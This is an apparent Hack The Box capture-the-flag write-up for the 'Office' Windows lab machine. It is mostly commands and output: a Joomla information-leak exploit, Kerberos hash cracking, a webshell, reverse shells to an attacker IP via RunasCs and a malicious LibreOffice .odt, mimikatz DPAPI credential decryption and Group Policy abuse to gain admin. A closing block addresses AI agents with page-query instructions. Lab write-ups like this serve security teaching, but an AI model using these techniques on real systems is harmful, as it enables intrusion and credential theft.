# HTB - Office

## Machine Info Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges. ## Enumeration **Scope** > IP Address: 10.10.11.3 **Nmap Scan** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ nmap -p- --min-rate 10000 $ip -Pn PORT STATE SERVICE REASON 53/tcp open domain syn-ack 80/tcp open http syn-ack 139/tcp open netbios-ssn syn-ack 443/tcp open https syn-ack 445/tcp open microsoft-ds syn-ack 593/tcp open http-rpc-epmap syn-ack 3268/tcp open globalcatLDAP syn-ack 3269/tcp open globalcatLDAPssl syn-ack 5985/tcp open wsman syn-ack 9389/tcp open adws syn-ack ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn PORT STATE SERVICE 53/udp open domain 88/udp open kerberos-sec 123/udp open ntp 389/udp open ldap ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2] └─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28) |_http-title: Home |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 | http-robots.txt: 16 disallowed entries (15 shown) | /joomla/administrator/ /administrator/ /api/ /bin/ | /cache/ /cli/ /components/ /includes/ /installation/ |_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/ |_http-generator: Joomla! - Open Source Content Management 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_ssl-date: TLS randomness does not represent time |_http-title: 403 Forbidden | tls-alpn: |_ http/1.1 |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time. | ssl-cert: Subject: commonName=DC.office.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC.office.htb | Not valid before: 2023-05-10T12:36:58 |_Not valid after: 2024-05-09T12:36:58 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time. | ssl-cert: Subject: commonName=DC.office.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC.office.htb | Not valid before: 2023-05-10T12:36:58 |_Not valid after: 2024-05-09T12:36:58 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-07-14T17:06:04 |_ start_date: N/A |_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s ``` ``` * Open ports: 53,80,139,443,445,593,3268,3269,5985,9389 * UDP open ports: 53,88,123,389 * Services: DNS - HTTP - HTTPS - SMB - KERBEROS - LDAP - winRM * Versions: Apache httpd 2.4.56 - OpenSSL/1.1.1t - PHP/8.0.28 * Important notes: http-robots.txt: 16 disallowed entries (15 shown) http-generator:Joomla! - Open Source Content Management Domain: office. - DNS:DC.office.htb ``` **HTTPS Enumeration** when visiting `https://10.10.11.3/`, it gives me `Forbidden` massages

**SMB Enumeration** No thing from smb

**KERBEROS Enumeration** Found some users from `kerbrute` with `jsmith.txt` wordlist

Additional users found when using `xato-10-million` wordlist

I added all users found in a wordlist and then tried `ASREPROASTING` attack but it failed

**HTTP Enumeration** `http://10.10.11.3/` The site is `joomla` CMS

I visited `http://10.10.11.3/readme.txt` to get the version and search for CVE for it ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ curl -s http://10.10.11.3/readme.txt | grep -i version * Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history ``` I found this version is affected by unauthenticated information disclosure vulnerability

I started `Metasploit`, searched for exploit with CVE number and found one ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ msfconsole -q msf6 > search CVE-2023-23752 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks msf6 > use 0 msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me tasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The URI of the Joomla Application THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3 msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run [+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin [+] Joomla Users ============ ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names -- ---------- ---- -------- ----- ---------- ------------- --------------- ----------- 474 * Tony Stark Administrator Administrator@holograp 1 2023-04-13 23:27: 2024-01-24 13:00: Super Users hy.htb 32 47 [+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin [+] Joomla Config ============= Setting Value ------- ----- db encryption 0 db host localhost db name joomla_db db password H0lOgrams4reTakIng0Ver754! db prefix if2tx_ db user root dbtype mysqli [*] Scanned 1 of 1 hosts (100% complete) ``` We get database credentials: ``` db host localhost db name joomla_db db password H0lOgrams4reTakIng0Ver754! db user root ``` Since I get username of `joomla` but still don't know the password, I will reuse the password of the database I found against the web login form and the users we found before

* Let's begin to enumerate the domain with these credentials and I will do the following * Run `Bloodhound Ingestors` * Enumerate the Shares * Searching for kerberoastable accounts 1. Run `bloodhound.py` to collect info and feed it into bloodhound GUI ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC.office.htb INFO: Done in 00M 21S ``` Start `crackmapexec` to view the shares and permissions on them

I run `spider_plus` module against the shares to explore their content fast ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False) SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! SPIDER_P... 10.10.11.3 445 DC [*] Started spidering plus with option: SPIDER_P... 10.10.11.3 445 DC [*] DIR: ['print$'] SPIDER_P... 10.10.11.3 445 DC [*] EXT: ['ico', 'lnk'] SPIDER_P... 10.10.11.3 445 DC [*] SIZE: 51200 SPIDER_P... 10.10.11.3 445 DC [*] OUTPUT: /tmp/cme_spider_plus ``` I found `.pcap` file located at `SOC Analysis` share, So I will download and examine it locally ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ cat /tmp/cme_spider_plus/10.10.11.3.json "SOC Analysis": { "Latest-System-Dump-8fbc124d.pcap": { "atime_epoch": "2023-05-07 20:59:54", "ctime_epoch": "2023-05-07 20:59:54", "mtime_epoch": "2023-05-10 14:51:42", "size": "1.31 MB" } ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis' Password for [WORKGROUP\dwolfe]: smb: \> ls . D 0 Wed May 10 14:52:24 2023 .. DHS 0 Wed Feb 14 05:18:31 2024 Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023 smb: \> get Latest-System-Dump-8fbc124d.pcap ``` ### **Shell as web\_account** Start `Wireshark` to examine the file ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ wireshark Latest-System-Dump-8fbc124d.pcap ``` After examining `wireshark`, Only two packets took my attention:

The second packet has the cipher which is encrypted by the NTLM hash of the user requested kerberos and username: `tstark`, too.

Following up this post {% embed url="" %} I can construct the kerberos hash to be able to crack it with hashcat ``` $$$$$cipher $krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ hashcat -m 19900 kerberos.hash /usr/share/wordlists/rockyou.txt $krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69 Session..........: hashcat Status...........: Cracked ``` I tried this password on `joomla` admin panel as administrator cause the CVE we found showed that the administrator account has `Tony Stark` name.

From `HackTricks`

After doing the steps above, I added a webshell and got RCE on the system

```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ curl -s http://$ip/administrator/templates/atum/error.php?cmd=whoami office\web_account ``` I will upgrade the webshell to `p0wny.php` to become more flexible

I didn't find useful things in the context of `web_account` as his home directory is empty, So I uploaded `RunasCs.exe` to get a shell with `stark` ### **Shell as tstark** ```powershell .\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444 [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-9b0db$\Default [+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background. ``` ```powershell ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ rlwrap nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764 PS C:\Windows\system32> whoami office\tstark PS C:\Users\tstark> type Desktop\user.txt fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx ``` > User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx ### **Shell as ppotts** looking for listening ports, there is non-standard port listening

Looking for the process that run this port revealed that its web server running ```powershell PS C:\xampp\htdocs\internal> tasklist /svc | findstr 4024 httpd.exe 4024 Apache2.4 ``` I uploaded `Chisel` to the machine and map this port to my kali machine. On kali run ```bash ./chisel_1.9.1_linux_amd64 server -p 8443 --reverse ``` On windows box run ```powershell .\c.exe client 10.10.16.7:8443 R:8083:localhost:8083 ``` `http://localhost:8083/resume.php`

The web app doesn't any file extension except these four `Doc, Docx, Docm, Odt`. after I uploaded a `file.odt` to the webapp, it appeared in `applications` folder under `xampp\htdocs` with different name > Note: No file with `.odt` was there before I upload my file!!! ```powershell PS C:\xampp\htdocs\internal> dir applications Directory: C:\xampp\htdocs\internal\applications Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/14/2024 4:13 PM 20321 john-it-30-000-0-5-years-john@htb-com.doc -a---- 7/14/2024 5:01 PM 0 john-it-30-000-0-5-years-john@htb-com.odt ``` checking its permissions, the user `ppotts` has full access on it. ```powershell PS C:\xampp\htdocs\internal> icacls applications icacls applications applications CREATOR OWNER:(OI)(CI)(IO)(F) OFFICE\PPotts:(OI)(CI)(NP)(F) NT AUTHORITY\SYSTEM:(OI)(CI)(F) NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F) OFFICE\web_account:(OI)(CI)(RX,W) BUILTIN\Administrators:(OI)(CI)(F) BUILTIN\Users:(OI)(CI)(RX) ``` > The community said that there is a CVE affected `Libreoffice` to create `.odt` file and get RCE from it {% embed url="" %} ```bash ┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255] └─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt' File exploit.odt has been created ! ``` Upload the exploit via webapp

Get a shell as `ppotts` ```powershell ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ rlwrap nc -lvnp 8888 listening on [any] 8888 ... connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159 Windows PowerShell PS C:\Program Files\LibreOffice 5\program> whoami office\ppotts ``` There is a `job_offering.ps1` on music directory that is responsible to trigger the exploit ```powershell PS C:\Users\PPotts> type Music\job_offering.ps1 # Specify the path to the directory containing ODT files $directoryPath = "C:\xampp\htdocs\internal\applications" # Get all ODT files in the directory $odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt foreach ($odtFile in $odtFiles) { $newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension $destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName Copy-Item -Path $odtFile.FullName -Destination $destination -Force del C:\xampp\htdocs\internal\applications\$odtFile } $odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt # Array to store LibreOffice process IDs $libreOfficeProcessIds = @() foreach ($odtFile in $odtFiles) { # Start LibreOffice to open the ODT file Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object { # Store the process ID for later termination $libreOfficeProcessIds = $_.Id } # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file Start-Sleep -Seconds 7 # Wait for LibreOffice processes to finish opening files and then terminate them Stop-Process -Id $libreOfficeProcessIds -Force # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file Start-Sleep -Seconds 5 } Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force # Put the MacroSecurityLevel key back to its original value reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f ``` ### **Shell as hhogan** There are stored credentials for `hhogan` in user `ppotts` session ```PowerShell PS C:\Users\PPotts> cmdkey /list Currently stored credentials: Target: LegacyGeneric:target=MyTarget Type: Generic User: MyUser Target: Domain:interactive=office\hhogan Type: Domain Password User: office\hhogan ``` When I tried to execute commands as that user, It asked for a password ```powershell PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami Enter the password for office\hhogan: ``` Looking at bloodhound, User `hhogan` is a member of `GPO MANAGERS` which has the ability to add group policy object that can be abused to do malicious actions.

As we don't know the password of `hhogan`, We can extract it by decrypting `DPAPI`. We need the masterkey and credentials files which are located by default in `\AppData\Roaming\Microsoft\Credentials` & `\AppData\Roaming\Microsoft\Protect\\GUID` Credentials files ```powershell PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Credentials Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E -a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4 -a-hs- 7/14/2024 5:18 PM 374 E76CCA3670CD9BB98DF79E0A8D176F1E ``` Master keys ```powershell PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\ Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d -a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb -a-hs- 7/14/2024 10:00 AM 740 5f692621-38e9-43bb-ad87-e3ff40ab2720 ``` I uploaded `mimkatz.exe` and began to extract them. We must provide a password for the command below but the is a post from `SpectorOps` that says " it can be done without a password, just provide `/rpc` options to `mimikatz`" ```powershell .\mimikatz.exe "dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc" exit .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc **MASTERKEYS** dwVersion : 00000002 - 2 szGuid : {191d3f9d-7959-4b4d-a520-a444853c47eb} dwFlags : 00000000 - 0 dwMasterKeyLen : 00000088 - 136 dwBackupKeyLen : 00000068 - 104 dwCredHistLen : 00000000 - 0 dwDomainKeyLen : 00000174 - 372 [masterkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : c521daa0857ee4fa6e4246266081e94c rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f [backupkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : a2741b13d7261697be4241ebbe05098a rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209 [domainkey] **DOMAINKEY** dwVersion : 00000002 - 2 dwSecretLen : 00000100 - 256 dwAccesscheckLen : 00000058 - 88 guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f} pbSecret : 159613bdc2d90dd4834a37e29873ce04c74722a706d0ba4770865039b3520ff46cf9c9281542665df2e72db48f67e16e2014e07b88f8b2f7d376a8b9d47041768d650c20661aee31dc340aead98b7600662d2dc320b4f89cf7384c2a47809c024adf0694048c38d6e1e3e10e8bd7baa7a6f1214cd3a029f8372225b2df9754c19e2ae4bc5ff4b85755b4c2dfc89add9f73c54ac45a221e5a72d3efe491aa6da8fb0104a983be20af3280ae68783e8648df413d082fa7d25506e9e6de1aadbf9cf93ec8dfc5fab4bfe1dd1492dbb679b1fa25c3f15fb8500c6021f518c74e42cd4b5d5d6e1057f912db5479ebda56892f346b4e9bf6404906c7cd65a54eea2842 pbAccesscheck : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665 [backupkey] without DPAPI_SYSTEM: key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6 sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2 [domainkey] with RPC [DC] 'office.htb' will be the domain [DC] 'DC.office.htb' will be the DC server key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166 sha1: 85285eb368befb1670633b05ce58ca4d75c73c77 ``` Try all the three credential files until you get the password ```powershell .\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166 **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 0000003a - 58 szDescription : Enterprise Credential Data algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a dwDataLen : 000000c0 - 192 pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97 dwSignLen : 00000014 - 20 pbSign : 21bfb22ca38e0a802e38065458cecef00b450976 Decrypting Credential: * masterkey : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166 **CREDENTIAL** credFlags : 00000030 - 48 credSize : 000000be - 190 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 5/9/2023 11:03:21 PM unkFlagsOrSize : 00000018 - 24 Persist : 00000003 - 3 - enterprise AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:interactive=OFFICE\HHogan UnkData : (null) Comment : (null) TargetAlias : (null) UserName : OFFICE\HHogan CredentialBlob : H4ppyxxxxxx Attributes : 0 ``` Checking the validity of the credentials and the ability to remote access the machine ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ crackmapexec smb $ip -u HHogan -p 'H4ppyxxxxxx' SMB 10.10.11.3 445 DC [+] office.htb\HHogan:H4ppyxxxxxx ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ crackmapexec winrm $ip -u HHogan -p 'H4ppyxxxxxx' WINRM 10.10.11.3 5985 DC [+] office.htb\HHogan:H4ppyFtW183# (Pwn3d!) ``` Access the machine as `hhogan` ```PowerShell ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office] └─$ evil-winrm -i $ip -u HHogan -p 'H4ppyxxxxxxx' *Evil-WinRM* PS C:\Users\HHogan\Documents> ``` > I don't know any tools to abuse GPO as I didn't perform this attack before so I searched online for one and find `SharpDPOAbuse` {% embed url="" %} ```powershell *Evil-WinRM* PS C:\Users\HHogan\Documents> upload SharpGPOAbuse.exe Info: Upload successful! ``` The github repo also shows how to use it

I will use `--AddLocalAdmin` and here are its options ``` Options required to add a new local admin: --UserAccount Set the name of the account to be added in local admins. --GPOName The name of the vulnerable GPO. Example: SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" ``` ```powershell *Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName DisplayName ----------- Windows Firewall GPO Default Domain Policy Default Active Directory Settings GPO Default Domain Controllers Policy Windows Update GPO Windows Update Domain Policy Software Installation GPO Password Policy GPO *Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy " [+] Domain = office.htb [+] Domain Controller = DC.office.htb [+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb [+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108 [+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9} [+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf [+] The GPO does not specify any group memberships. [+] versionNumber attribute changed successfully [+] The version number in GPT.ini was increased successfully. [+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle. [+] Done! ``` Update the group policy to take effect ```powershell *Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force Updating policy... Computer Policy update has completed successfully. User Policy update has completed successfully. ``` ```powershell *Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/14/2024 9:59 AM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt abd037fa1e9078e44dxxxxxxxxxxxxxxxxx ``` > Root Flag: abd037fa1e9078e44dxxxxxxxxxxxxxxxxx --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/hard/htb-office.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.